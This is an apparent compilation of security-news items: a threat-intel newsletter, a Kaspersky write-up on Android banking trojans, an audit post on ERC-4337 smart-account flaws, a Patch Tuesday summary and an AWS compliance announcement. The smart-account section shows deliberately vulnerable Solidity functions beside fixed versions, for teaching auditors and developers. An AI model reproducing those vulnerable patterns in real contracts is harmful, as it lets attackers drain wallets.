I’m glad to see more individual interviews from Ryan on the Three Buddy Problem podcast! In this “Security Conversations” segment, Ryan interviews threat-hunting and intelligence expert Greg Linares. Greg has all kinds of visibility working at an MDR and recently released a year-in-review report on some of the intrusions Huntress is seeing.

The most interesting sections for me were around the intersection of ransomware and nation-state threat actors, as well as the use of RMM tools and the complete lack of audit logging and visibility they provide defenders. Imagine onboarding any other critical IT tool, such as an Enterprise Email provider or a Cloud tool, and being told there will be little to no telemetry available to help you defend the application against a compromise. That’s RMM in a nutshell!


Investigating Suspected DPRK-Linked Crypto Intrusions by CTRL-Alt-Intel

I talk a lot about DPRK-related threat activity in this newsletter for several reasons. One, DPRK tends to focus on cloud technologies, and IMHO, they were way ahead of their other nation-state peers. Two, they are just so damn crafty and are willing to move fast and break things. Three, because of point two, they have a ton of OPSEC failures that lead to some hilarious findings.

In this post, CTRL-Alt-Intel follows an intrusion by a DPRK actor who began with an application exploit a la React2Shell, found AWS credentials, pivoted to AWS, and ultimately stole source code. The author notes the activity focused mostly on cryptocurrency companies; assuming this intrusion targeted one of those organizations, the intelligence value would lie in discovering secrets and vulnerabilities in proprietary code for further attacks.


Uncovering agent logging gaps in Copilot Studio by Katie Knowles

~ Note, Datadog is my employer and Katie is my colleague / friend! ~

Microsoft Copilot Studio is Microsoft’s offering for creating and managing AI agents. During Katie’s previous research on how to abuse Copilot Studio for OAuth phishing, she found that Copilot wasn’t logging certain administrative actions. This is especially concerning if you rely on audit logs for threat detection. A victim agent could be abused to retrieve sensitive information from your organization, and you’d have no visibility into the attack itself.

Katie provides excellent security recommendations towards the end, including identifying which M365 users are using Copilot, and what searches and rules you could write to detect anomalous activity in Copilot.


This was a fun read for those who are interested in phishing-related threat research. Ceukelaire got a phishing text message, accessed the phishing page, and began poking holes in it. He found a vulnerability where setting the X-Forwarded-For header to a localhost address (Substack won’t let me publish it?) automatically bypassed the administrator login panel.

From there, he started rendering the kit useless by removing its functionality and its ability to communicate with a Telegram-controlled channel. He was able to stop victim exfiltration and prevent further victims from visiting the website. Luckily, it was a poorly designed phishing kit, riddled with vulnerabilities, but not all kits are this insecure.


Clearing the Water: Unmasking an Attack Chain of MuddyWater by Harlan Carvey and Jamie Levy

In this post, Huntress researchers Carvey and Levy detailed findings related to what appears to be a hands-on-keyboard MuddyWater campaign targeting one of their customers. They first found intelligence from a Hunt.io report and worked backwards into their own customer reports. Some interesting findings they made include:

  • Typos in the terminal commands MuddyWater ran, indicating an actor who was typing in real time during the intrusion

  • Tradecraft learnings, such as opening PowerShell from Explorer, making it seem like more legitimate activity than running it from the command line

  • Troubleshooting in real time by cURLing ifconfig.me to make sure they had Internet connectivity

It turns out that threat actors make mistakes too!


🔗 Open Source

killvxk/awesome-C2

Yet another awesome-* list of 300+ Command and Control frameworks. This is a fun list if you want to test adversary simulation in a lab environment, or statically analyze the post-exploitation code for detection opportunities.


edsonencinas/log-analyzer

Encinas’ pure Python “SIEM” used in his SSH log analysis blog post listed above in the State of the Art section. What’s nice about this is it reduces the complexity of standing up an environment, and instead you can focus on the concepts of detection in a contained programming language.


github/spec-kit

Not really detection related, but this was something my colleague Matt Muller sent me as I was vibecoding out a fully STIXv2 compliant Threat Intelligence Platform. Spec Kit is a framework for spec-driven development using agents. You create a constitution that sets guidelines for development principles. You then specify what you want to build, how you want to plan to build it with certain technologies, build a task list and then have the agent go to work.

I kept my speckit separate from my code, so my agent would read and update my local spec and then go into the target project directory for development.


m1k1o/neko

Self-hosted virtual browser using containers and WebRTC. These technologies are always super interesting from an OPSEC perspective, because you can embed a browser in a website you host alongside neko. This makes it easy to build non-attributable, disposable infrastructure for things like threat intelligence research or interacting with threat actor infrastructure.


anotherhadi/default-creds

Open-source database of default credentials across hundreds of manufacturers. You can download the credentials yourself, run their self-contained web application, or just visit the hosted web application and find some hilarious default creds.



Augmented Phishing: Social Engineering in the Age of AI

The rise of GenAI has pushed social engineering and phishing to new levels. What once required manual effort can now be generated in seconds, resulting in hyper-personalized messages, cloned executive voices, and even realistic video impersonations. Deepfake incidents have already moved from online curiosity to real business risk, driving financial loss and operational disruption in organizations worldwide.  On everyday collaboration platforms, verifying identity has become increasingly difficult. Real-time face and voice cloning remove many traditional warning signs, making scams harder to spot than ever. As the threat landscape shifts, organizations need modern defenses and smarter awareness programs designed for the realities of the AI era.  Check Point Services has recently expanded its training portfolio to help […]

The post Augmented Phishing: Social Engineering in the Age of AI appeared first on Check Point Blog.


BeatBanker and BTMOB trojans: infection techniques and how to stay safe | Kaspersky official blog

To achieve their malign aims, Android malware developers have to clear several hurdles in a row: trick users into installing them on their smartphones, dodge security software, talk victims into granting various system permissions, keep away from built-in battery optimizers that kill resource hogs, and, after all that, make sure their malware actually turns a profit. The creators of BeatBanker (an Android-based malware campaign recently discovered by our experts) have come up with something new for each one of these steps. The attack is (for now) aimed at Brazilian users, but the developers’ ambitions will almost certainly push them toward international expansion, so it’s worth staying on guard and studying the threat actor’s tricks. You can find a full technical analysis of the malware on Securelist.

How BeatBanker infiltrates a smartphone

The malware is distributed through specially crafted phishing pages that mimic the Google Play Store. A page that’s easily mistaken for the official app marketplace invites users to download a seemingly useful app. In one campaign, the trojan disguised itself as the Brazilian government services app, INSS Reembolso; in another, it posed as the Starlink app.

The malicious site cupomgratisfood{.}shop does an excellent job imitating an app store. It’s just unclear why the fake INSS Reembolso appears all of three times. To be extra sure, perhaps?!

The installation takes place in several stages to avoid requesting too many permissions at once and to further lull the victim’s vigilance. After the first app is downloaded and launched, it displays an interface that also resembles Google Play and simulates an update for the decoy app — requesting the user’s permission to install apps, which doesn’t look out-of-the-ordinary in context. If you grant this permission, the malware downloads additional malicious modules to your smartphone.

After installation, the trojan simulates a decoy app update via Google Play by requesting permission to install applications while downloading additional malicious modules in the process

All components of the trojan are encrypted. Before decrypting and proceeding to the next stages of infection, it checks to ensure it’s on a real smartphone and in the target country. BeatBanker immediately terminates its own process if it finds any discrepancies or detects that it’s running in emulated or analysis environments. This complicates dynamic analysis of the malware. Incidentally, the fake update downloader injects modules directly into RAM to avoid creating files on the smartphone that would be visible to security software.

All these tricks are nothing new and frequently used in complex malware for desktop computers. However, for smartphones, such sophistication is still a rarity, and not every security tool will spot it. Users of Kaspersky products are protected from this threat.

Playing audio as a shield

Once established on the smartphone, BeatBanker downloads a module for mining Monero cryptocurrency. The authors were very concerned that the smartphone’s aggressive battery optimization systems might shut down the miner, so they came up with a trick: playing an all-but-inaudible sound at all times. Power consumption control systems typically spare apps that are playing audio or video to avoid cutting off background music or podcast players. In this way, the malware can run continuously. Additionally, it displays a persistent notification in the status bar, asking the user to keep the phone on for a system update.

Example of a persistent system update notification from another malicious app masquerading as the Starlink app

Control via Google

To manage the trojan, the authors leverage Google’s legitimate Firebase Cloud Messaging (FCM) — a system for receiving notifications and sending data from a smartphone. This feature is available to all apps and it’s the most popular method for sending and receiving data. Thanks to FCM, attackers can monitor the device’s status and change its settings as needed.

Nothing bad happens for a while after the malware is installed: the attackers wait it out. Then they trigger the miner, but they’re careful to throttle it back if the phone overheats, the battery starts dipping, or the owner happens to be using the device. All of this is handled via FCM.

Theft and espionage

In addition to the crypto miner, BeatBanker installs extra modules to spy on the user and rob them at the right moment. The spyware module requests Accessibility Services permission, and if this is granted, begins monitoring everything that’s happening on the smartphone.

If the owner opens the Binance or Trust Wallet app to send USDT, the malware overlays a fake screen on top of the wallet interface, effectively swapping the recipient’s address for its own. All transfers go to the attackers.

The trojan features an advanced remote control system and is capable of executing many other commands:

  • Intercepting one-time codes from Google Authenticator
  • Recording audio from the microphone
  • Streaming the screen in real-time
  • Monitoring the clipboard and intercepting keystrokes
  • Sending SMS messages
  • Simulating taps on specific areas of the screen and text input according to a script sent by the attacker, and much more

All of this makes it possible to rob the victim when they use any other banking or payment services — not just crypto payments.

Sometimes victims are infected with a different module for espionage and remote smartphone control — the BTMOB remote access trojan. Its malicious capabilities are even broader, including:

  • Automatic acquisition of certain permissions on Android 13–15
  • Continuous geolocation tracking
  • Access to the front and rear cameras
  • Obtaining PIN codes and passwords for screen unlocking
  • Capturing keyboard input

How to protect yourself from BeatBanker

Cybercriminals are constantly refining their attacks and coming up with new ways to profit from their victims. Despite this, you can protect yourself by following a few simple precautions:

  • Download apps from official sources only, such as Google Play or the app store preinstalled by the vendor. If you find an app while searching the internet, don’t open it via a link from your browser; instead, head to the Google Play app or another branded store on your smartphone to search for it there. While you’re at it, check the number of downloads, the app’s age, and look at the ratings and reviews. Avoid new apps, apps with low ratings, and those with a small number of downloads.
  • Check any permissions you grant. Don’t grant permissions if you’re not sure what they do or why that specific app requires them. Be extra careful with permissions like Install unknown apps, Accessibility, Superuser, and Display over other apps. We’ve written about these in detail in a separate article.
  • Equip your device with a comprehensive anti-malware solution. We, naturally, recommend Kaspersky for Android. Users of Kaspersky products are protected from BeatBanker — detected with the verdicts HEUR:Trojan-Dropper.AndroidOS.BeatBanker and HEUR:Trojan-Dropper.AndroidOS.Banker.*.
  • Regularly update both your operating system and security software. For Kaspersky for Android, which is currently unavailable on Google Play, please review our detailed instructions on installing and updating the app.

Threats to Android users have been going through the roof lately. Check out our other posts on the most relevant and widespread Android attacks and tips for keeping you and your loved ones safe:


Six mistakes in ERC-4337 smart accounts

Account abstraction transforms fixed “private key can do anything” models into programmable systems that enable batching, recovery and spending limits, and flexible gas payment. But that programmability introduces risks: a single bug can be as catastrophic as leaking a private key.

After auditing dozens of ERC‑4337 smart accounts, we’ve identified six vulnerability patterns that frequently appear. By the end of this post, you’ll be able to spot these issues and understand how to prevent them.

How ERC-4337 works

Before we jump into the common vulnerabilities that we often encounter when auditing smart accounts, here’s the quick mental model of how ERC-4337 works. There are two kinds of accounts on Ethereum: externally owned accounts (EOAs) and contract accounts.

  • EOAs are simple key-authorized accounts that can’t run custom logic. For example, common flows like token interactions require two steps (approve/permit, then execute), which fragments transactions and confuses users.

  • Contract accounts are smart contracts that can enforce rules, but cannot initiate transactions on their own.

Before account abstraction, if you wanted wallet logic like spending limits, multi-sig, or recovery, you’d deploy a smart contract wallet like Safe. The problem was that an EOA still had to kick off every transaction and pay gas in ETH, so in practice, you were juggling two accounts: one to sign and one to hold funds.

ERC-4337 removes that dependency. The smart account itself becomes the primary account. A shared EntryPoint contract and off-chain bundlers replace the EOA’s role, and paymasters let you sponsor gas or pay in tokens instead of ETH.

Here’s how ERC-4337 works:

  • Step 1: The user constructs and signs a UserOperation off-chain. This includes the intended action (callData), a nonce, gas parameters, an optional paymaster address, and the user’s signature over the entire message.

  • Step 2: The signed UserOperation is sent to a bundler (think of it as a specialized relayer). The bundler simulates it locally to check it won’t fail, then batches it with other operations and submits the bundle on-chain to the EntryPoint via handleOps.

  • Step 3: The EntryPoint contract calls validateUserOp on the smart account, which verifies the signature is valid and that the account can cover the gas cost. If a paymaster is involved, the EntryPoint also validates that the paymaster agrees to sponsor the fees.

  • Step 4: Once validation passes, the EntryPoint calls back into the smart account to execute the actual operation. The following figure shows the EntryPoint flow diagram from ERC-4337:

Figure 1: EntryPoint flow diagram from ERC-4337
Figure 1: EntryPoint flow diagram from ERC-4337

If you’re not already familiar with ERC-4337 or want to dig into the details we’re glossing over here, it’s worth reading through the full EIP. The rest of this post assumes you’re comfortable with the basics.
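As a rough mental model of the four steps above, here is a toy Python sketch (nothing here corresponds to the real Solidity contracts or hashing; it only shows the order of responsibilities between bundler, EntryPoint, and account):

```python
from dataclasses import dataclass

@dataclass
class UserOperation:
    sender: str
    nonce: int
    call_data: str
    signature: str

class SmartAccount:
    def __init__(self, owner_sig):
        self.owner_sig = owner_sig
        self.executed = []

    def validate_user_op(self, op):
        # Step 3: the account itself, not the EntryPoint, decides what
        # a valid signature means.
        return op.signature == self.owner_sig

    def execute(self, call_data):
        # Step 4: runs only after validation passes.
        self.executed.append(call_data)

class EntryPoint:
    def handle_ops(self, ops, accounts):
        # Step 2: a bundler submits the batch; the EntryPoint validates
        # each op, then calls back into the account to execute it.
        for op in ops:
            account = accounts[op.sender]
            if account.validate_user_op(op):
                account.execute(op.call_data)

accounts = {"0xabc": SmartAccount(owner_sig="sig-ok")}
ops = [UserOperation("0xabc", 0, "transfer(...)", "sig-ok"),
       UserOperation("0xabc", 1, "drain()", "bad-sig")]
EntryPoint().handle_ops(ops, accounts)
print(accounts["0xabc"].executed)  # ['transfer(...)']
```

The key takeaway for the vulnerability patterns below is that the account's own validation and execution functions are the trust boundary.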

Now that we’ve covered how ERC-4337 works, let’s explore the common vulnerability patterns we encounter in our audits.

1. Incorrect access control

If anyone can call your account’s execute function (or anything that moves funds) directly, they can do anything with your wallet. Only the EntryPoint contract, or a vetted executor module in ERC-7579, should be allowed to trigger privileged paths.

A vulnerable implementation allows anyone to drain the wallet:

function execute(address target, uint256 value, bytes calldata data) external {
 // No caller check: any address can make the account run arbitrary calls
 (bool ok,) = target.call{value: value}(data);
 require(ok, "exec failed");
}
Figure 2: Vulnerable execute function

While in a safe implementation, the execute function is callable only by entryPoint:

address public immutable entryPoint;

function execute(address target, uint256 value, bytes calldata data)
 external
{
 require(msg.sender == entryPoint, "not entryPoint");
 (bool ok,) = target.call{value: value}(data);
 require(ok, "exec failed");
}
Figure 3: Safe execute function

Here are some important considerations for access control:

  • For each external or public function, ensure that the proper access controls are set.

  • In addition to the EntryPoint access control, some functions need to restrict access to the account itself. This is because you may frequently want to call functions on your contract to perform administrative tasks like module installation/uninstallation, validator modifications, and upgrades.

2. Incomplete signature validation (specifically the gas fields)

A common and serious vulnerability arises when a smart account verifies only the intended action (for example, the callData) but omits the gas-related fields:

  • preVerificationGas

  • verificationGasLimit

  • callGasLimit

  • maxFeePerGas

  • maxPriorityFeePerGas

All of these values are part of the payload and must be signed and checked by the validator. Since the EntryPoint contract computes and settles fees using these parameters, any field that is not cryptographically bound to the signature and not sanity-checked can be altered by a bundler or a frontrunner in transit.

By inflating these values (for example, preVerificationGas, which directly reimburses calldata/overhead), an attacker can cause the account to overpay and drain ETH. preVerificationGas is the portion meant to compensate the bundler for work outside validateUserOp, primarily calldata size costs and fixed inclusion overhead.

We use preVerificationGas as the example because it’s the easiest lever to extract ETH: if it isn’t signed or strictly validated/capped, someone can simply bump that single number and get paid more, directly draining the account.

Robust implementations must bind the full UserOperation, including all gas fields, into the signature, and should also enforce conservative caps and consistency checks during validation.

Here’s an example of an unsafe validateUserOp function:

function validateUserOp(UserOperation calldata op, bytes32 /*hash*/, uint256 /*missingFunds*/)
    external
    returns (uint256 validationData)
{
    // Only checks that the calldata is "approved"
    require(_isApprovedCall(op.callData, op.signature), "bad sig");
    return 0;
}
Figure 4: Unsafe validateUserOp function

And here’s an example of a safe validateUserOp function:

function validateUserOp(UserOperation calldata op, bytes32 userOpHash, uint256 /*missingFunds*/)
    external
    returns (uint256 validationData)
{
    require(_isApprovedCall(userOpHash, op.signature), "bad sig");
    return 0;
}
Figure 5: Safe validateUserOp function

Here are some additional considerations:

  • Ideally, use the userOpHash sent by the EntryPoint contract, which includes the gas fields by spec.

  • If you must allow flexibility, enforce strict caps and reasonability checks on each gas field.
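If your design cannot bind every gas field into the signature, caps can be enforced directly during validation. The following Solidity sketch is illustrative only: the constant limits and the helper name are hypothetical placeholders, not recommended values.

```solidity
// Illustrative only: sanity-cap unsigned gas fields during validation.
// The limits below are hypothetical placeholders, not recommendations.
uint256 constant MAX_PRE_VERIFICATION_GAS = 100_000;
uint256 constant MAX_FEE_PER_GAS = 200 gwei;

function _checkGasFields(UserOperation calldata op) internal pure {
    // preVerificationGas directly reimburses the bundler, so cap it tightly
    require(op.preVerificationGas <= MAX_PRE_VERIFICATION_GAS, "preVerificationGas too high");
    require(op.maxFeePerGas <= MAX_FEE_PER_GAS, "maxFeePerGas too high");
    // Consistency check: priority fee can never exceed the max fee
    require(op.maxPriorityFeePerGas <= op.maxFeePerGas, "priority fee exceeds max fee");
}
```

A helper like this would be called from validateUserOp before approving the operation.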

3. State modification during validation

Writing state in validateUserOp and then using it during execution is dangerous since the EntryPoint contract validates all ops in a bundle before executing any of them. For example, if you cache the recovered signer in storage during validation and later use that value in execute, another op’s validation can overwrite it before yours runs.

contract VulnerableAccount {
    address public immutable entryPoint;
    address public owner1;
    address public owner2;

    address public pendingSigner;

    modifier onlyEntryPoint() { require(msg.sender == entryPoint, "not EP"); _; }

    function validateUserOp(UserOperation calldata op, bytes32 userOpHash, uint256)
        external
        returns (uint256)
    {
        address signer = recover(userOpHash, op.signature);
        require(signer == owner1 || signer == owner2, "unauthorized");
        // DANGEROUS: persists signer; can be clobbered by another validation
        pendingSigner = signer;
        return 0;
    }

    // Later: appends signer into the call; may use the WRONG (overwritten) signer
    function executeWithSigner(address target, uint256 value, bytes calldata data) external onlyEntryPoint {
        bytes memory payload = abi.encodePacked(data, pendingSigner);
        (bool ok,) = target.call{value: value}(payload);
        require(ok, "exec failed");
    }
}
Figure 6: Vulnerable account that changes its state in the validateUserOp function

In Figure 6, one owner can pass validation while the execute step ends up using the other owner’s address, because a second op’s validation overwrites pendingSigner before the first op executes. Depending on how the execute function is supposed to behave, this can be an attack vector.

Here are some important considerations for state modification:

  • Avoid modifying the state of the account during the validation phase.

  • Remember batch semantics: all validations run before any execution, so any “approval” written in validation can be overwritten by a later op’s validation.

  • Use a mapping keyed by userOpHash to persist temporary data, and delete it deterministically after use, but prefer not persisting anything at all.
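If temporary data truly must survive into execution, keying it by userOpHash avoids one op clobbering another’s state. The sketch below reuses the illustrative names from Figure 6 (owner1, owner2, recover, onlyEntryPoint); it is an assumption-laden sketch of the pattern, not a drop-in fix.

```solidity
// Sketch: per-operation storage keyed by userOpHash, so each op's
// validation writes its own slot and cannot overwrite another's.
mapping(bytes32 => address) private signerFor;

function validateUserOp(UserOperation calldata op, bytes32 userOpHash, uint256)
    external
    onlyEntryPoint
    returns (uint256)
{
    address signer = recover(userOpHash, op.signature);
    require(signer == owner1 || signer == owner2, "unauthorized");
    signerFor[userOpHash] = signer; // keyed per op, not a shared slot
    return 0;
}

function executeWithSigner(bytes32 userOpHash, address target, uint256 value, bytes calldata data)
    external
    onlyEntryPoint
{
    address signer = signerFor[userOpHash];
    require(signer != address(0), "no signer");
    delete signerFor[userOpHash]; // deterministic cleanup after use
    (bool ok,) = target.call{value: value}(abi.encodePacked(data, signer));
    require(ok, "exec failed");
}
```

Even so, the preferable design remains not persisting anything during validation at all.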

4. ERC‑1271 replay signature attack

ERC‑1271 is a standard interface for contracts to validate signatures so that other contracts can ask a smart account, via isValidSignature(bytes32 hash, bytes signature), whether a particular hash has been approved.

A recurring pitfall, highlighted by security researcher curiousapple (read the post-mortem here), is to verify that the owner signed a hash without binding the signature to the specific smart account and the chain. If the same owner controls multiple smart accounts, or if the same account exists across chains, a signature created for account A can be replayed against account B or on a different chain.

The remedy is to use EIP‑712 typed data so the signature is domain‑separated by both the smart account address (as verifyingContract) and the chainId.

At a minimum, the signed payload must include the account and chain so that a signature cannot be transplanted across accounts or networks. A robust pattern is to wrap whatever needs authorizing inside an EIP‑712 struct and recover against the domain; this automatically binds the signature to the correct account and chain.

function isValidSignature(bytes32 hash, bytes calldata sig)
    external
    view
    returns (bytes4)
{
    // Replay issue: recovers over a raw hash,
    // not bound to this contract or chainId.
    return ECDSA.recover(hash, sig) == owner ? MAGIC : 0xffffffff;
}
Figure 7: Example of a vulnerable implementation of ERC-1271

function isValidSignature(bytes32 hash, bytes calldata sig)
    external
    view
    returns (bytes4)
{
    bytes32 structHash = keccak256(abi.encode(TYPEHASH, hash));
    bytes32 digest = _hashTypedDataV4(structHash);
    return ECDSA.recover(digest, sig) == owner ? MAGIC : 0xffffffff;
}
Figure 8: Safe implementation of ERC-1271

Here are some considerations for ERC-1271 signature validations:

  • Always verify EIP‑712 typed data so the domain binds signatures to chainId and the smart account address.

  • Enforce exact ERC‑1271 magic value return (0x1626ba7e) on success; anything else is failure.

  • Test negative cases explicitly: same signature on a different account, same signature on a different chain, and same signature after nonce/owner changes.

5. Reverts don’t save you in ERC‑4337

In ERC-4337, once validateUserOp succeeds, the bundler gets paid regardless of whether execution later reverts. This is the same model as normal Ethereum transactions, where miners collect fees even on failed txs, so planning to “revert later” is not a safety net. The success of validateUserOp commits you to paying for gas.

This has a subtle consequence: if your validation is too permissive and accepts operations that will inevitably fail during execution, a malicious bundler can submit those operations repeatedly, each time collecting gas fees from your account without anything useful happening.

A related issue we’ve seen in audits involves paymasters that pay the EntryPoint from a shared pool during validateUserOp, then try to charge the individual user back in postOp. The problem is that postOp can revert (bad state, arithmetic errors, risky external calls), and a revert in postOp does not undo the payment that already happened during validation. An attacker can exploit this by repeatedly passing validation while forcing postOp to fail (for example, by withdrawing their ETH from the pool during execution of the userOp), draining the shared pool.

The robust approach is to never rely on postOp for core invariants. Debit fees from a per-user escrow or deposit during validation, so the money is secured before execution even begins. Treat postOp as best-effort bookkeeping: keep it minimal, bounded, and designed to never revert.
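As a sketch of the escrow approach, a paymaster might debit a per-user deposit during validation and treat postOp as a best-effort refund. This assumes an EntryPoint v0.6-style paymaster interface; the names and accounting below are illustrative, not a production design.

```solidity
// Sketch: debit the user's escrow up front, so a reverting postOp
// can never leave the shared pool holding the bill.
mapping(address => uint256) public deposits;

function validatePaymasterUserOp(UserOperation calldata op, bytes32, uint256 maxCost)
    external
    onlyEntryPoint
    returns (bytes memory context, uint256 validationData)
{
    address account = op.sender;
    require(deposits[account] >= maxCost, "insufficient deposit");
    deposits[account] -= maxCost; // funds secured before execution begins
    return (abi.encode(account, maxCost), 0);
}

function postOp(PostOpMode, bytes calldata context, uint256 actualGasCost) external onlyEntryPoint {
    (address account, uint256 maxCost) = abi.decode(context, (address, uint256));
    // Best-effort refund of the unused portion: simple arithmetic,
    // no external calls, designed to never revert
    if (actualGasCost < maxCost) {
        deposits[account] += maxCost - actualGasCost;
    }
}
```

Because the debit happens in validation, a failing postOp only costs the attacker their own refund, not the pool’s funds.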

Here are some important considerations for ERC-4337:

  • Make postOp minimal and non-reverting: avoid external calls and complex logic, and instead treat it as best-effort bookkeeping.

  • Test both success and revert paths. Remember that once validateUserOp returns success, the account will pay for the gas.

6. Old ERC‑4337 accounts vs ERC‑7702

ERC‑7702 allows an EOA to temporarily act as a smart account by activating code for the duration of a single transaction, which effectively runs your wallet implementation in the EOA’s context. This is powerful, but it opens an initialization race. If your logic expects an initialize(owner) call, an attacker who spots the 7702 delegation can frontrun with their own initialization transaction and set themselves as the owner. The straightforward mitigation is to permit initialization only when the account is executing as itself in that 7702‑powered call. In practice, require msg.sender == address(this) during initialization.

function initialize(address newOwner) external {
    // Only callable when the account executes as itself (e.g., under 7702)
    require(msg.sender == address(this), "init: only self");
    require(owner == address(0), "already inited");
    owner = newOwner;
}
Figure 9: Example of a safe initialize function for an ERC-7702 smart account

This works because, during the 7702 transaction, calls executed by the EOA‑as‑contract have msg.sender == address(this), while a random external transaction cannot satisfy that condition.

Here are some important considerations for ERC-7702:

  • Require msg.sender == address(this) and owner == address(0) in initialize; make it single‑use and impossible for external callers.

  • Create separate smart accounts for ERC‑7702–enabled EOAs and non‑7702 accounts to isolate initialization and management flows.

Quick security checks before you ship

Use this condensed list as a pre-merge gate for every smart account change. These checks block some common AA failures we see in audits and production incidents. Run them across all account variants, paymaster paths, and gas configurations before you ship.

  • Use the EntryPoint’s userOpHash for validation.

  • Restrict execute/privileged functions to EntryPoint (and self where needed).

  • Keep validateUserOp stateless: don’t write to storage.

  • Force EIP‑712 for ERC‑1271 and other signed messages.

  • Make postOp minimal, bounded, and non‑reverting.

  • For ERC‑7702, allow init only when msg.sender == address(this), once.

  • Add multiple end-to-end tests on success and revert paths.

If you need help securely implementing smart accounts, contact us for an audit.


March 2026 Patch Tuesday fixes two zero-day vulnerabilities

Microsoft releases important security updates on the second Tuesday of every month, known as Patch Tuesday. This month’s update fixes 79 Microsoft CVEs, including two zero-day vulnerabilities.

Microsoft defines a zero-day as “a flaw in software for which no official patch or security update is available yet.” So, since the patch is now available, those two are no longer zero-days. There is also no reason to believe they were ever actively exploited.

But let’s have a look at the possible consequences if you don’t install the update.

The vulnerability tracked as CVE-2026-21262 (CVSS score 8.8 out of 10) is a bug in Microsoft SQL Server that lets a logged-in user quietly climb the privilege ladder and potentially become a full database administrator (sysadmin). With that level of control, they can read, change, or delete data, create new accounts, and tamper with database configurations or jobs. Where SQL Server is supposed to check what each user is allowed to do, in this case it can be tricked into granting more power than intended.

There is no user interaction required once the attacker has that foothold: exploitation can happen over the network using crafted SQL requests that abuse the flawed permission checks. In a typical real‑world scenario, this bug would be the second act in an attack chain: first get in with low privileges, then use CVE-2026-21262 to quietly promote yourself to database king and start rewriting the script.

CVE-2026-26127 (CVSS score 7.5 out of 10) is a bug in Microsoft’s .NET platform that lets an attacker remotely crash .NET applications, effectively taking them offline for a while. The flaw lives in Microsoft .NET 9.0 and 10.0, across Windows, macOS, and Linux, in the .NET runtime or libraries, not in a specific app. In other words, it’s a bug in the engine that runs .NET code, so any app created with affected .NET versions could be at risk until patched.

The main outcome is denial of service: an attacker can cause targeted .NET processes to crash or become unstable, leading to downtime or degraded performance. For a public‑facing web API, a payment service, or any line‑of‑business app built on .NET, this can mean real‑world outages and angry users while services are repeatedly knocked over.

Also notable for Microsoft Office users are two remote code execution flaws in Microsoft Office (CVE-2026-26110 and CVE-2026-26113), which can both be exploited via the preview pane, and a Microsoft Excel information disclosure flaw (CVE-2026-26144), which could be used to exfiltrate data via Microsoft Copilot. Office vulnerabilities appear regularly in Patch Tuesday releases, and in this case none have been reported as actively exploited.

How to apply fixes and check if you’re protected

These updates fix security problems and keep your Windows PC protected. Here’s how to make sure you’re up to date:

1. Open Settings

  • Click the Start button (the Windows logo at the bottom left of your screen).
  • Click on Settings (it looks like a little gear).

2. Go to Windows Update

  • In the Settings window, select Windows Update (usually at the bottom of the menu on the left).

3. Check for updates

  • Click the button that says Check for updates.
  • Windows will search for the latest Patch Tuesday updates.
  • If you have chosen to get the latest updates as soon as they’re available, you may see a Restart required message under More options. Restart your system and the update will complete.
    Restart now to apply patches
  • If not, continue with the steps below.

4. Download and Install

  • If updates are found, they’ll start downloading right away. Once complete, you’ll see a button that says Install or Restart now.
  • Click Install if needed and follow any prompts. Your computer will usually need a restart to finish the update. If it does, click Restart now.
    Windows up to date

5. Double-check you’re up to date

  • After restarting, go back to Windows Update and check again. If it says You’re up to date, you’re all set!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.


AWS European Sovereign Cloud achieves first compliance milestone: SOC 2 and C5 reports plus seven ISO certifications

In January 2026, we announced the general availability of the AWS European Sovereign Cloud, a new, independent cloud for Europe entirely located within the European Union (EU), and physically and logically separate from all other AWS Regions. The unique approach of the AWS European Sovereign Cloud provides the only fully featured, independently operated sovereign cloud backed by strong technical controls, sovereign assurances, and legal protections designed to meet the sensitive data needs of European governments and enterprises.

One of the foundational components of how AWS European Sovereign Cloud enables verifiable trust of technical controls and delivers assurance is through our compliance programs and assurance frameworks. These programs help customers understand the robust controls in place at AWS European Sovereign Cloud to maintain security and compliance of the cloud. To meet the needs of our customers, we committed that the AWS European Sovereign Cloud will maintain key certifications such as ISO/IEC 27001:2022, System and Organization Controls (SOC) reports, and Cloud Computing Compliance Criteria Catalogue (C5) attestation, all validated regularly by independent auditors to assure our controls are designed appropriately, operate effectively, and can help customers satisfy their compliance obligations.

Today, AWS European Sovereign Cloud is pleased to announce that SOC 2 and C5 Type 1 attestation reports, along with seven key ISO certifications (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018, and 9001:2015), are now available. These attestation reports and certifications cover 69 AWS services operating within the AWS European Sovereign Cloud, and this achievement marks a pivotal first step in our journey to establish the AWS European Sovereign Cloud as a trusted and compliant cloud for European organizations. By securing these foundational certifications and attestation reports early in our implementation, we are demonstrating our commitment to earning customer trust.

AWS European Sovereign Cloud customers in Germany and across Europe can now run their applications with enhanced assurance and confidence that our infrastructure aligns with internationally recognized security standards and the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). These certifications and attestation reports provide independent validation of our security controls and operational practices, demonstrating our commitment to meeting the heightened expectations towards cloud service providers. Beyond compliance, these certifications and reports help customers meet regulatory requirements and innovate with confidence.

SOC 2 Type 1 report

SOC reports are independent third-party examinations that show how AWS European Sovereign Cloud meets compliance controls and sovereignty objectives. The AWS European Sovereign Cloud SOC 2 report addresses three critical AICPA Trust Services Criteria: Security, Availability, and Confidentiality, and includes internal controls mapped to the ESC-SRF. The ESC-SRF establishes sovereignty criteria across key domains including governance independence, operational control, data residency, and technical isolation. As part of the SOC 2 Type 1 attestation, independent third-party auditors have validated the suitability of the design and implementation of our controls addressing measures such as independent European Union (EU) corporate structures, operation by EU-resident AWS personnel, strict residency requirements for Customer Content and Customer-Created Metadata, and separation from all other AWS Regions. The ESC-SRF controls in our SOC 2 report show customers how AWS delivers on its sovereignty commitments.

C5 Type 1 report

C5 is a German Government-backed attestation scheme introduced in Germany by the Federal Office for Information Security (BSI) and represents one of the most comprehensive cloud security standards in Europe. The AWS European Sovereign Cloud C5 Type 1 report provides customers with independent third-party attestation on the suitability of the design and implementation of our controls to meet both C5 basic criteria and C5 additional criteria.

The basic criteria establish fundamental security requirements for cloud service providers, covering areas such as organization of information security, human resources security, asset management, access control, cryptography, physical security, operations security, communications security, system acquisition and development, supplier relationships, incident management, business continuity, and compliance. The additional criteria address enhanced requirements for handling sensitive data and critical applications, making this attestation particularly valuable for AWS European Sovereign Cloud customers with stringent data security and sovereignty requirements.

Key ISO certifications

AWS European Sovereign Cloud has achieved seven key ISO certifications that collectively demonstrate comprehensive operational excellence.

